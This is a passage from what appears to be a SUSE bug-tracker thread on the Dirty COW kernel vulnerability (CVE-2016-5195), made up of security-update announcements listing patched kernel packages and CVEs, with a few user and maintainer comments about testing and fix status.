SUSE Manager Proxy 2.1 (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-source-3.0.101-0.47.90.1, kernel-syms-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1
SUSE Manager 2.1 (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-source-3.0.101-0.47.90.1, kernel-syms-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1
SUSE Linux Enterprise Server 11-SP3-LTSS (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-pae-3.0.101-0.47.90.1, kernel-source-3.0.101-0.47.90.1, kernel-syms-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1
SUSE Linux Enterprise Server 11-EXTRA (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-pae-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src): kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-pae-3.0.101-0.47.90.1, kernel-source-3.0.101-0.47.90.1, kernel-syms-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-pae-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1
I tested both the /proc/self/mem and the PTRACE_POKEDATA based exploits from https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs on a SLES 10 machine and both did not result in exploitation. (Of course this is no explicit proof.)
openSUSE-SU-2016:2625-1: An update that solves 12 vulnerabilities and has 19 fixes is now available.

Category: security (important)
Bug References: 1000287,1001486,1003077,1003925,1003931,1004045,1004418,1004462,881008,909994,911687,922634,951155,960689,978094,980371,986570,989152,991247,991608,991665,993890,993891,994296,994520,994748,994752,994759,996664,999600,999932
CVE References: CVE-2015-7513,CVE-2015-8956,CVE-2016-0823,CVE-2016-1237,CVE-2016-5195,CVE-2016-5696,CVE-2016-6327,CVE-2016-6480,CVE-2016-6828,CVE-2016-7117,CVE-2016-7425,CVE-2016-8658
Sources used:
openSUSE 13.2 (src): bbswitch-0.8-3.22.1, cloop-2.639-14.22.1, crash-7.0.8-22.1, hdjmod-1.28-18.23.1, ipset-6.23-22.1, kernel-debug-3.16.7-45.1, kernel-default-3.16.7-45.1, kernel-desktop-3.16.7-45.1, kernel-docs-3.16.7-45.2, kernel-ec2-3.16.7-45.1, kernel-obs-build-3.16.7-45.1, kernel-obs-qa-3.16.7-45.1, kernel-obs-qa-xen-3.16.7-45.1, kernel-pae-3.16.7-45.1, kernel-source-3.16.7-45.1, kernel-syms-3.16.7-45.1, kernel-vanilla-3.16.7-45.1, kernel-xen-3.16.7-45.1, pcfclock-0.44-260.22.1, vhba-kmp-20140629-2.22.1, virtualbox-5.0.28-54.2, xen-4.4.4_05-51.2, xtables-addons-2.6-24.1
SUSE-SU-2016:2632-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 1004418,986362
CVE References: CVE-2016-4997,CVE-2016-5195
Sources used:
SUSE Linux Enterprise Server for SAP 12 (src): kgraft-patch-SLE12_Update_10-6-2.1
SUSE Linux Enterprise Server 12-LTSS (src): kgraft-patch-SLE12_Update_10-6-2.1
openSUSE-SU-2016:2649-1: An update that solves 49 vulnerabilities and has 17 fixes is now available.

Category: security (important)
Bug References: 1004418,758540,816446,861093,917648,928130,935757,939826,942367,944296,945825,946117,946309,948562,949744,949936,951440,952384,953527,954404,955354,955654,956708,956709,958463,958886,958951,959190,959399,961500,961509,961512,963765,963767,964201,966437,966460,966662,966693,967972,967973,967974,967975,968010,968011,968012,968013,968670,969356,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971126,971360,972510,973570,975945,977847,978822
CVE References: CVE-2013-7446,CVE-2015-0272,CVE-2015-1339,CVE-2015-3339,CVE-2015-5307,CVE-2015-6252,CVE-2015-6937,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3134,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-4486,CVE-2016-5195
Sources used:
openSUSE Evergreen 11.4 (src): kernel-debug-3.0.101-105.1, kernel-default-3.0.101-105.1, kernel-desktop-3.0.101-105.1, kernel-docs-3.0.101-105.2, kernel-ec2-3.0.101-105.1, kernel-pae-3.0.101-105.1, kernel-source-3.0.101-105.1, kernel-syms-3.0.101-105.1, kernel-trace-3.0.101-105.1, kernel-vanilla-3.0.101-105.1, kernel-vmi-3.0.101-105.1, kernel-xen-3.0.101-105.1, preload-1.2-6.83.1
The SLE(S/D) 12 SP2 Goldmaster candidates have this issue fixed, so SLE 12 SP2 is being delivered fixed to customers.
I am using openSUSE Leap 42.1 with kernel: uname -r 4.1.34-33-default Has it been fixed for my kernel version?
(In reply to Name Deleted from comment #133)
> I am using openSUSE Leap 42.1 with kernel:
>
> uname -r
> 4.1.34-33-default
>
> Has it been fixed for my kernel version?

Yes, in comment #c97 is the release announcement for the 42.1 Leap kernel with version 4.1.34-33.1. (the .1 is not shown in uname -r)
(In reply to Marcus Meissner from comment #135) Great. Thank you!
all kernel updates and live patches were released, ptfs are available for inactive older distributions.
An update workflow for this issue was started. This issue was rated as important. Please submit fixed packages until 2016-11-28. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/63212
An update workflow for this issue was started. This issue was rated as important. Please submit fixed packages until 2016-12-05. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/63229
openSUSE-SU-2016:3021-1: An update that solves 12 vulnerabilities and has 118 fixes is now available.

Category: security (important)
Bug References: 1000189,1000287,1000304,1000776,1001419,1001486,1002165,1003079,1003153,1003400,1003568,1003866,1003925,1004252,1004418,1004462,1004517,1004520,1005666,1006691,1007615,1007886,744692,772786,789311,799133,857397,860441,865545,866130,868923,874131,875631,876145,876463,898675,904489,909994,911687,915183,921338,921784,922064,922634,924381,924384,930399,931454,934067,937086,937888,940545,941420,946309,954986,955446,956514,959463,961257,962846,963655,963767,966864,967640,970943,971975,971989,974406,974620,975596,975772,976195,977687,978094,979451,979681,979928,982783,983619,984194,984419,984779,984992,985562,986445,987192,987333,987542,987565,987621,987805,988440,988617,988715,989152,989953,990245,991247,991608,991665,992244,992555,992591,992593,992712,993392,993841,993890,993891,994296,994438,994520,994748,994758,995153,995968,996664,997059,997299,997708,997896,998689,998795,998825,999577,999584,999600,999779,999907,999932
CVE References: CVE-2013-5634,CVE-2015-8956,CVE-2016-2069,CVE-2016-5696,CVE-2016-6130,CVE-2016-6327,CVE-2016-6480,CVE-2016-6828,CVE-2016-7042,CVE-2016-7097,CVE-2016-7425,CVE-2016-8658
Sources used:
openSUSE 13.1 (src): cloop-2.639-11.36.1, crash-7.0.2-2.36.1, hdjmod-1.28-16.36.1, ipset-6.21.1-2.40.1, iscsitarget-1.4.20.3-13.36.1, kernel-debug-3.12.67-58.1, kernel-default-3.12.67-58.1, kernel-desktop-3.12.67-58.1, kernel-docs-3.12.67-58.2, kernel-ec2-3.12.67-58.1, kernel-pae-3.12.67-58.1, kernel-source-3.12.67-58.1, kernel-syms-3.12.67-58.1, kernel-trace-3.12.67-58.1, kernel-vanilla-3.12.67-58.1, kernel-xen-3.12.67-58.1, ndiswrapper-1.58-37.1, openvswitch-1.11.0-0.43.1, pcfclock-0.44-258.37.1, vhba-kmp-20130607-2.36.1, virtualbox-4.2.36-2.68.1, xen-4.3.4_10-69.1, xtables-addons-2.3-2.35.1
SUSE-SU-2016:3069-1: An update that solves 11 vulnerabilities and has 49 fixes is now available.

Category: security (important)
Bug References: 1000189,1001419,1002165,1004418,732582,839104,843236,909994,911687,915183,920016,934760,951392,956514,960689,963655,971975,971989,974620,976867,977687,979514,979595,979681,980371,982218,982783,983535,983619,984102,984194,984992,985206,986362,986365,986445,987565,988440,989152,989261,989779,991608,991665,991923,992566,993127,993890,993891,994296,994436,994618,994759,994926,996329,996664,997708,998399,999584,999600,999932
CVE References: CVE-2013-4312,CVE-2015-7513,CVE-2016-0823,CVE-2016-3841,CVE-2016-4997,CVE-2016-4998,CVE-2016-5195,CVE-2016-5696,CVE-2016-6480,CVE-2016-6828,CVE-2016-7425
Sources used:
SUSE Linux Enterprise Real Time Extension 11-SP4 (src): kernel-rt-3.0.101.rt130-65.1, kernel-rt_trace-3.0.101.rt130-65.1, kernel-source-rt-3.0.101.rt130-65.1, kernel-syms-rt-3.0.101.rt130-65.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src): kernel-rt-3.0.101.rt130-65.1, kernel-rt_debug-3.0.101.rt130-65.1, kernel-rt_trace-3.0.101.rt130-65.1
SUSE-SU-2016:3304-1: An update that solves 13 vulnerabilities and has 118 fixes is now available.

Category: security (important)
Bug References: 1000189,1000287,1000304,1000776,1001419,1001486,1002165,1003079,1003153,1003400,1003568,1003925,1004252,1004418,1004462,1004517,1004520,1005666,1006691,1007615,1007886,744692,789311,857397,860441,865545,866130,868923,874131,875631,876145,876463,898675,904489,909994,911687,915183,921338,921784,922064,922634,924381,924384,930399,934067,937086,937888,941420,946309,955446,956514,959463,961257,962846,963655,963767,966864,967640,970943,971975,971989,974406,974620,975596,975772,976195,977687,978094,979451,979681,979928,980371,981597,982783,983619,984194,984419,984779,984992,985562,986362,986365,986445,987192,987333,987542,987565,987621,987805,988440,988617,988715,989152,989953,990058,990245,991247,991608,991665,991667,992244,992555,992568,992591,992593,992712,993392,993841,993890,993891,994167,994296,994438,994520,994758,995153,995968,996664,997059,997299,997708,997896,998689,998795,998825,999577,999584,999600,999779,999907,999932
CVE References: CVE-2015-8956,CVE-2016-2069,CVE-2016-4998,CVE-2016-5195,CVE-2016-5696,CVE-2016-6130,CVE-2016-6327,CVE-2016-6480,CVE-2016-6828,CVE-2016-7042,CVE-2016-7097,CVE-2016-7425,CVE-2016-8658
Sources used:
SUSE Linux Enterprise Real Time Extension 12-SP1 (src): kernel-compute-3.12.67-60.27.1, kernel-compute_debug-3.12.67-60.27.1, kernel-rt-3.12.67-60.27.1, kernel-rt_debug-3.12.67-60.27.1, kernel-source-rt-3.12.67-60.27.1, kernel-syms-rt-3.12.67-60.27.1